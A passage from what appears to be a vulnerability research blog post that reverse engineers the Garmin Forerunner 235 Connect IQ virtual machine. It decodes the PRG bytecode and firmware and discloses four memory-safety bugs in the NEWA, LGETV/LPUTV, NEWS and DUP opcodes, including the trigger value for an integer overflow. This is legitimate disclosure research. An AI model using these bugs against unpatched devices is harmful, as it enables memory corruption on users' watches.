    }
}

Using the SDK provided by Garmin, it is possible to compile and run this code:

(venv) ➜  AtrediFace make
monkeyc -o ./bin/AtrediFace.prg \
        -y ../connectiq-sdk-mac-3.1.7-2020-01-23-a3869d977/developer_key \
        -f ./monkey.jungle \
        -d fr235
(venv) ➜  AtrediFace touch /Volumes/GARMIN/GARMIN/APPS/LOGS/AtrediFace.TXT
(venv) ➜  AtrediFace cp bin/AtrediFace.prg /Volumes/GARMIN/GARMIN/APPS/

Notice that it was possible to sideload an App by copying the PRG file onto the watch. When the watch is plugged into the computer, it exposes a file system as a USB Mass Storage device.

Atredis bird on watch face

Once the watch is unplugged, we'll see our beautiful Atredis bird soaring onto the watch face. After the watch face program has executed, debug output can be found on the FAT file system (after, once again, plugging the watch back into the computer).

(venv) ➜  AtrediFace cat /Volumes/GARMIN/GARMIN/APPS/LOGS/AtrediFace.TXT
onExitSleep
0xf00d + 1 = 61454

Now that we're able to code some simple Monkey C, compile it to a PRG file, and run the code on the watch, we can get back to trying to answer the burning question of: But why?

Further reading on the Garmin developer website, forum, and a few web searches provides more background. A Garmin-authored presentation provides the justification for a new language and corresponding virtual machine. The Garmin applications, like Java applications, execute bytecode on a virtual machine. Like Android (and the Infocom Z-machine and Java Card systems before it), the CIQ applications are intended to run on a wide variety of devices. Further, the Garmin devices are limited in resources (computation, memory, and battery) and any runtime/OS environment should be able to restrict each client application's usage of these resources. Finally, the Garmin OS and application execution environment need to be able to enforce access control and isolation -- this includes memory isolation when lacking strong virtual memory subsystem within the OS. A badly behaving CIQ application should not be able to bring down the entire watch (i.e., Garmin wanted to be better than Windows 95).

The reasoning for running these applications in a virtual machine is clear. Garmin decided to develop a full ecosystem of language, compiler, runtime, and virtual machine to support this. That means we get to reverse-engineer all of it! 🎉 The language is documented in the SDK documentation. The compiler is provided in the SDK and can be reversed from that. The language runtime is implemented in firmware with the interface specified in the SDK. The virtual machine is not publicly documented but can be understood based on a combination of the compiler and the firmware.

This last bit, the details around the virtual machine, is most interesting to me. Using this mapping between concept and implementation, we'll attempt to answer the following questions by reverse engineering the compiler and firmware:

  1. What does the virtual machine executable image look like?

  2. Can the virtual applications mix native code with bytecode?

  3. What is the architecture of the virtual machine?

  4. How does the virtual machine interface with native code for the SDK?

Compiler

The downloadable SDK is mostly Java class files. It decompiles extremely well. The monkeybrains package includes a number of interesting tools but we focus on the compiler and assembler that work together to produce a PRG file. Pulling these apart provides a decent view of the PRG file structure. The high-level structure encapsulates a number of sections enveloped as type-length-value (TLV) structures. These sections include debugging metadata, bytecode, data, resources (e.g., strings for translations, bitmaps), and linking information for the runtime. There is an existing open source project, ciqdb, to parse much of this file format (although it does not handle the sections with the bytecode or the embedded resources yet).

Within the asm package, the Opcode class contains constants with mnemonic names for 55 different opcodes. Now, we have (mostly) familiar looking mnemonics that we can map to opcodes. Further reversing of the decompiled asm package leads us to an understanding of the bytecode stream from the PRG files. Below is a short hand disassembly of the foo function shown in Monkey C above:

The PRG bytecode for the foo function is:

00000110: 35 01 01 01 25 00 00 F0  0D 13 01 27 00 80 00 05  5...%......'....
00000120: 30 27 00 80 00 67 0D 2A  18 00 00 02 CF 12 01 25  0'...g.*.......%
00000130: 00 00 00 01 03 27 00 80  00 AF 0D 2A 0F 01 03 0F  .....'.....*....
00000140: 02 02 16 35 01 01 00 12  00 27 00 80 02 9C 0D 27  ...5.....'.....'

The disassembly looks something like:

00000110: 35 01            ARGC 1
00000112: 01 01            INCSP 1
00000114: 25 00 00 F0 0D   IPUSH 0xF00D
00000119: 13 01            LPUTV 1
0000011B: 27 00 80 00 05   SPUSH 0x800005 ; "Toybox_System"
00000120: 30               GETM
00000121: 27 00 80 00 67   SPUSH 0x800067 ; "println"
00000126: 0D               GETV
00000127: 2A               FRPUSH
00000128: 18 00 00 02 CF   NEWS 0x2CF ; "0xf00d + 1 = " 
0000012d: 12 01            LGETV 1
0000012f: 25 00 00 00 01   IPUSH 0x01
00000134: 03               ADD
00000135: 27 00 80 00 AF   SPUSH 0x8000AF ; "toString"
0000013a: 0D               GETV
0000013b: 2A               FRPUSH
0000013c: 0F 01            INVOKE 1
0000013e: 03               ADD
0000013f: 0F 02            INVOKE 2
00000141: 02               POPV
00000142: 16               RETURN

So far, we've answered our initial question about the executable image format and we can start guessing at the virtual machine organization. Unfortunately, we don't have quite enough information in the compiler/assembler to answer much more about the system definitively. For that, we should move along and start working on the firmware. Specifically, we need to find the portion of the firmware responsible for loading, parsing, and executing these PRG images.

Firmware

A quick google for Garmin Forerunner firmware provides the official Garmin website. While the release notes are good, there does not appear to be a direct download of the firmware images from the website. Luckily, someone else already yanked the firmware from wherever the Garmin Connect app pulls from. (Or, at least, they used to. The archive of firmware was found at http://gawisp.com/perry/forerunner/ but it seems the site is currently down.)

With the firmware in hand, we need to determine how Garmin performs an update. Is the image a flat flash image? Does it contain metadata or a header? Does the format support a partial update? Again, we're lucky because someone has also already figured out the type-length-value (TLV) envelope structure of the GCD update files. There is a document providing information on the structure. All it takes is a little time with our best friend hexdump -C to see that the Forerunner 235 update contains two "large" images that can be pulled out. Interestingly, one is the size of the SRAM on the SoC we identified earlier via the teardown (of the Maxim MAX32630) and the other is the size of the internal flash. If I had to bet, I'd believe the first is a bootstrap that is written into SRAM so the firmware that is eXecute-In-Place can be replaced. We can write a quick Python script to extract the "main" firmware that we believe is written to the internal flash.

    @classmethod
    def parse(cls, f):
        header = f.read(8)
        if header != b'GARMINd\x00':
            raise Exception('Unknown firmware format')

        tlvs = []
        while True:
            data = f.read(4)
            if len(data) != 4: break

            tag, length = struct.unpack('<HH', data)
            value = f.read(length)
            tlvs.append((tag, length, value))
            print('  0x{:04x}: 0x{:04x}'.format(tag, length))

        return cls(tlvs)

With the main firmware extracted, our ARM RE fingers should really be starting to itch. From the datasheet of the MAX32630, we know the internal flash is probably mapped starting at 0x0. Since the extracted flat image is mapped directly, there is no need for a dedicated IDA loader plugin -- the IDA load UI is flexible enough. Once the image is loaded and the appropriate architecture for the Cortex-M is selected, adding segments for SRAM and the peripheral ranges provide a solid starting point for the reverse engineering effort.

After running some Thumb function finding heuristic scripts against the initial database, what next? Our first goal is to find the code responsible for parsing and running the virtual machine programs. The parsing logic is probably the better of the two to start with -- the identification of the parsing logic will also help identify the runtime representation of the program. In most cases, the parsing logic will output an internal runtime representation. Understanding this runtime structure provides context for all reverse engineering of the execution or processing surrounding the loaded program. In this case, taking the time to create and refine the internal runtime context structure is worth the effort.

A quick look at the strings identified by IDA doesn't immediately provide any hints around the PRG processing. When strings are lacking, the next best handhold is using unique constants. In this case, the PRG tags are unique 32-bit integers perfect for IDA's "Search -> Immediate value...". Searching for 0xd000d000, the main PRG header tag, reveals a single function passing this value into a sub function. Perfect!

unsigned int __fastcall read_prg_header(int a1, _DWORD *a2, int a3)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v4 = a1;
  v5 = prg_extract_section_data(a1, 0xD000D000, &a3a, &out_offset, 1u);
  v6 = (void *)mem_alloc(a3a.length, 3, &handle);
  handle = v6;
  if ( !v6 )
    goto LABEL_2;
  if ( v5 == (void *)1 )
  {
    v9 = (int *)mem_pointer_borrow(v6);
    v10 = v9;
    v11 = file_read_(v4, v9, a3a.length);
    if ( v11 == a3a.length )
    {
      v17 = *v10;
      if ( a2 )
      {
        v12 = a3a.length;
        v13 = v17;
        *a2 = a3a.tag;
...

Using this as a starting point and walking up and down the call stack surrounding this function reveals, as we hoped, the code for parsing a PRG file. We will spare the reader three weeks of reverse engineering play-by-play as the virtual machine, deemed the "TVM" by Garmin, is analyzed and the runtime objects and utilities are reversed. In addition to the TVM, the OS structures and APIs need to be reversed along the way. The watch runs a Garmin developed OS but context clues and a few useful strings help determine the general OS object APIs. The OS provides abstractions for objects such as semaphores, tasks, events, and queues. A layer above this provides a file system abstraction and memory allocation routines. The TVM layers a richer abstraction on the memory allocation logic for tracking TVM program quotas and for maintaining reference counts on allocated buffers.

The TVM is a stack-based virtual machine. Each runtime value is stored along with the accompanying type. Opcodes manipulate values stored on the stack and can reference local variables reserved on the stack by index. Values are created at runtime by loading data from the PRG data section or via immediate values embedded in the bytecode stream. Once loaded onto the stack, the value can be manipulated and passed around the system. All runtime allocations are tracked per TVM instance. This tracking is an effort to prevent a buggy or malicious program from taking down the entire system via resource exhaustion. Runtime objects are also reference counted, as noted above, and are deterministically garbage collected when the last reference is released.

During analysis of the TVM context block, the PRG loading, and the runtime initialization, we're able to make some progress toward understanding how the virtual machine interacts with the native runtime (one of our overall goals). Below is an excerpt from a function we named tvm_run_function. This function is used to enter a TVM function based on a TVM virtual address, for example when handling a CALL opcode or to run initialization function after loading the PRG. We can see that, based on the high bits of the address, the TVM either executes a native function based on a function pointer table (tvm_native_methods) or executes bytecode by entering the opcode dispatch loop (tvm_execute_opcodes).

  if ( (function_addr.value & 0xFF000000) == 0x40000000 )
  {
    v17 = LOWORD(function_addr.value);
    if ( LOWORD(function_addr.value) > 0xC5u )
    {
      v8 = 15;
      goto LABEL_4;
    }
    ctx->pc_ptr = (char *)tvm_native_methods[LOWORD(function_addr.value)];
    v18 = tvm_native_methods[v17]((int)ctx, a4);
    if ( v18 == 21 )
      return v8;
    if ( tvm_native_methods[v17] != sub_10F18C )
    {
      if ( v18 )
        goto LABEL_15;
      v18 = tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
    }
    if ( !v18 )
      v18 = tvm_op_return(ctx);
  }
  else
  {
    v18 = tvm_tvmaddr_to_ptr(ctx, function_addr.value, &ctx->pc_ptr);
    if ( !v18 )
      v18 = tvm_execute_opcodes(ctx);
  }

After weeks of reverse engineering and marking up an IDA database, we've answered questions 2, 3, and 4 pretty well. Additionally, along the way, we've identified a handful of code that appears to violate contracts made amongst the virtual machine runtime. Maybe the real treasures were the bugs we found along the way?

TVM Opcode Bugs

While reversing the TVM system, we noted a number of the opcode handlers performed operations that appeared to break the virtual machine abstraction. Below, we'll follow up on each of those. More information about each vulnerability, including the disclosure timeline, can be found at ATREDIS-2020-0004, ATREDIS-2020-0005, ATREDIS-2020-0006, and ATREDIS-2020-0007.

NEWA

One instruction, NEWA, is used to create an runtime array of TVM values of a fixed size. The array is initialized with the null value. NEWA expects a number-like value on the top of the stack indicating the size of the array. Decompilation of the NEWA opcode implementation shows just the one check on the length value (ensuring it is not negative) before passing it to tvm_value_array_allocate for the array size calculation.

int __fastcall tvm_op_newa(struct tvm *ctx)
{
  struct stack_value *sp;
  int rv;
  unsigned int length;
  struct tvm_value value;

  sp = ctx->stack_ptr;
  length = 0;
  value = *sp;
  rv = tvm_value_to_int(ctx, &value, &length);
  if ( rv ) {
    if ( length < 0 )
    {
      rv = 10;
      tvm_value_decref(ctx, &value);
      return rv;
    }

    rv = tvm_value_array_allocate(ctx, length, ctx->stack_ptr);
    if ( rv )
    {
      rv = tvm_value_decref(ctx, &value);
      if ( !rv )
        return tvm_value_incref(ctx, ctx->stack_ptr);
    }
  }
  tvm_value_decref(ctx, &value);
  return rv;
}

The tvm_value_array_allocate function will perform the unchecked array size calculation as shown below.

int __fastcall tvm_value_array_allocate(struct tvm *ctx, int length, struct tvm_value *array_value)
{
  unsigned int allocation_size; // r6
  int rv; // r0 MAPDST
  struct tvm_value_array_data *array_data; // r9
  void *array_data_handle; // [sp+4h] [bp-24h] MAPDST

  array_data_handle = 0;
  allocation_size = 5 * length + 15;
  rv = tvm_alloc_for_app(ctx, allocation_size, &array_data_handle);
  if ( !array_data_handle )
    return 7;
  array_data = (struct tvm_value_array_data *)mem_pointer_borrow(array_data_handle);
  memset((int *)array_data, 0, allocation_size);
  array_data->m_0x01 = 1;
  array_data->type = ARRAY;
  array_data->length = length;
  mem_pointer_release(array_data_handle);
  array_value->type = ARRAY;
  array_value->value = (unsigned int)array_data_handle;
  return rv;
}

The allocation size calculation can overflow the 32-bit integer and can be triggered by creating an array of size 0x33333333. This value is still positive for a 32-bit integer (passing the check in the tvm_op_newa function). When the allocation_size is calculated, the result will overflow the 32-bit unsigned int:

>>> length = 0x33333333
>>> allocation_size = 5 * length + 15
>>> hex(allocation_size)
'0x10000000e'
>>> hex(allocation_size & 0xffffffff)
'0xe'

The original length value (0x33333333) is stored in the resulting tvm_value_array_data and this is the value used to check bounds during the array read and write operations (performed by the AGETV and APUTV instructions).

This can be directly triggered through Monkey C and does not require direct bytecode manipulation to create a proof-of-concept. There are a number of additional constraints to turn this into a reliable read/write anything anywhere primitive but it provides are strong exploit building block.

LGETV and LPUTV

The instructions LGETV and LPUTV are used to read and write to a local variable. The virtual machine maintains a frame pointer used to point at the start of the frame on the stack. The entry of a method will reserve some space on the stack to store local variables. The LGETV and LPUTV instructions expect a single byte operand specifying the local variable index for that instruction. The implementation does not check that this index is within the previously allocated local variable space as seen below.


int __fastcall tvm_op_lgetv(struct tvm *ctx)
{
  char *pc_at_entry; // r3
  struct stack_value *sp_at_entry; // r1
  int local_var_idx; // t1
  struct stack_value *local_var_ptr; // r2
  struct stack_value *v6; // r5

  pc_at_entry = ctx->pc_ptr;
  sp_at_entry = ctx->stack_ptr;
  local_var_idx = (unsigned __int8)*pc_at_entry;
  ctx->pc_ptr = pc_at_entry + 1;
  local_var_ptr = &ctx->frame_ptr[local_var_idx + 1];
  ctx->stack_ptr = sp_at_entry + 1;
  sp_at_entry[1] = *local_var_ptr;
  v6 = (struct stack_value *)&ctx->m_0x007b;
  tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
  tvm_value_decref(ctx, v6);
  ctx->m_0x007b = (struct tvm_value)*ctx->stack_ptr;
  tvm_value_incref(ctx, (struct tvm_value *)v6);
  return 0;
}

The unchecked offset from the frame_ptr of the execution context provides a path to both memory access past the end of the TVM context allocation (the stack is allocated at the end of this structure) and a primitive to construct a use-after-free taking advantage of the way values outside of the valid stack are treated.

NEWS

The NEWS instruction creates a runtime string object from a string definition structure in the data section of the PRG. Upon execution, this instruction pushes a new tvm_value of type STRING onto the top of the stack. The value of the string is loaded from an address provided as a 32-bit operand. The data at the provided address is expected to contain a string definition of the form:

uint8_t one; // 0x01
uint16_t length;
uint8_t utf8_string[length];

The string data buffer is allocated to hold length bytes and then a function similar to strcpy is used to populate it. The strcpy-like function will only stop when a NUL byte is encountered possibly overflowing the buffer beyond the size of the initial allocation.

int __fastcall tvm_op_news(struct tvm *ctx)
{
  int tvm_addr_for_string; // r0
  struct stack_value *v3; // r2
  int result; // r0

  tvm_addr_for_string = tvm_fetch_int((int *)&ctx->pc_ptr);
  v3 = ctx->stack_ptr;
  ctx->stack_ptr = v3 + 1;
  v3[1].type = NULL;
  ctx->stack_ptr->value = 0;
  result = tvm_value_load_string(ctx, tvm_addr_for_string, (int)ctx->stack_ptr);
  if ( !result )
    result = tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
  return result;
}

int __fastcall tvm_value_load_string(struct tvm *ctx, int string_def_addr, int string_value_out)
{
  int rv; // r0
  unsigned __int8 *string_def; // [sp+4h] [bp-14h]

  rv = tvm_tvmaddr_to_ptr(ctx, string_def_addr, &string_def);
  if ( !rv )
    rv = tvm_string_def_to_value(ctx, string_def, (unsigned __int8 *)string_value_out, 1);
  return rv;
}

int __fastcall tvm_string_def_to_value(_BYTE *a1, unsigned __int8 *a2, unsigned __int8 *a3, int a4)
{
  _BYTE *v4; // r6
  unsigned __int8 *v5; // r4
  struct tvm_value *v6; // r5
  int result; // r0
  _BYTE *v8; // r4
  int v9; // r6
  __int16 v10; // r0
  int v11; // r3
  int v12; // [sp+4h] [bp-14h]

  v4 = a1;
  v5 = a2;
  v6 = (struct tvm_value *)a3;
  if ( a4 )
  {
    if ( *a2 != 1 )
      return 5;
    v5 = a2 + 1;
  }
  result = tvm_value_string_alloc_by_size((struct tvm *)a1, v5[1] | (*v5 << 8), (int)a3);
  if ( !result )
  {
    result = tvm_value_string_to_ptr(v4, v6, &v12);
    if ( !result )
    {
      v8 = v5 + 2;
      v9 = v12;
      v10 = strlen_utf8(v8);
      v11 = v12;
      *(_WORD *)(v9 + 6) = v10;
      strcpy_(v11 + 8, (unsigned int)v8);
      if ( v6->type == STRING )
        return sub_10DE28(v6);
      return 5;
    }
  }
  return result;
}

The tvm_string_def_to_value function allocates the string using the size found in memory and then proceeds to strcpy the provided data into the freshly allocated buffer.

DUP

The DUP instruction allows the running program to duplicate a value from any slot on the stack and push the copy on the top of the stack.

int __fastcall tvm_op_dup(struct tvm *ctx)
{
  char *pc; // r1
  struct stack_value *sp; // r2
  int stack_offset; // t1
  struct tvm *ctx:v4; // r3
  int v5; // r0
  struct stack_value v7; // [sp+0h] [bp-10h]

  pc = ctx->pc_ptr;
  sp = ctx->stack_ptr;
  stack_offset = (unsigned __int8)*pc;
  ctx->pc_ptr = pc + 1;
  ctx:v4 = ctx;
  v7 = sp[-stack_offset];
  v5 = *(_DWORD *)&v7.type;
  ctx:v4->stack_ptr = sp + 1;
  *(_DWORD *)&sp[1].type = v5;
  HIBYTE(sp[1].value) = HIBYTE(v7.value);
  tvm_value_incref(ctx:v4, (struct tvm_value *)&v7);
  return 0;
}

The implementation reads the next byte from the instruction stream, uses this byte as the negative offset to read from the top of the stack, and then copies that value to the next stack entry. Finally, the function increases the reference count in the tvm_value. The lack of a bounds check allows referencing memory outside of the stack for the tvm_value copy resulting in multiple primitives including use-after-free.

What next?

Well, those are a handful of bugs found via static code analysis. They were also found by accident without a dedicated plan of attack or comprehensive audit of the TVM attack surface. While the TVM appears clean in design and implementation, these bugs suggest the CIQ applications were likely not considered attack surface in the past. Finding more of the lower hanging bugs should be straightforward using a dynamic fuzzing approach. Unfortunately, doing so on an off-the-shelf device is slow and lacks reliability. An interesting next step would be running the firmware, either stock or modified, on a devkit or within a QEMU emulated environment.

We've spent some time working towards a functioning QEMU patch that emulates the MAX32630 and some of the relevant peripherals. We're not yet to the point where the watch comes all the way up but have learned more and more about the firmware in the process. A more direct approach would set up a runtime state that allowed just the PRG loader and TVM interpreter to run. This seems possible but the Garmin RTOS provides a number of services that would need to be stubbed out.

Another interesting task would be to finish a full code execution exploit for these bugs and to pivot towards exploitation of one of the attached microcontrollers (the Bluetooth controller, for instance).

Edit (11-18-2020): Clarified firmware current during analysis and added a link to the updated (patched) firmware.


This blog post was written by Dion Blazakis, technical peer review by Zach Lanier, and edited for the web by Lacey Kasten at Atredis Partners.